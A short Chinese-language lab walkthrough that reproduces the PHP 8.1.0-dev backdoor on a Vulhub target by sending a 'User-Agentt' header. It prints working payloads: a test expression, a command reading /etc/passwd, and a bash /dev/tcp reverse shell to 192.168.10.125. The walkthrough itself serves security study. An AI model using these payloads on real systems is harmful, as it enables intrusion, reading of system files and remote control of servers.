PHP系列漏洞–PHP-8.1.0-dev 后门命令执行漏洞复现

漏洞简述

PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送**User-Agentt**头来执行任意代码。

准备环境

启动Vulnhub靶机环境:

验证靶机应用启用成功:

漏洞复现

使用burp抓包:

在数据包中添加User-Agentt: 字段并在后面添加上测试漏洞poc:

zerodiumvar_dump(3*7);

 

将字段后面poc修改为zerodiumsystem(“cat /etc/passwd”);读取文件

 

修改payload执行反弹shell,打开一台kali并设置监听,将poc修改为以下反弹shell的poc

zerodiumsystem(“bash -c ‘exec bash -i >& /dev/tcp/192.168.10.125/6666 0>&1′”);

漏洞利用成功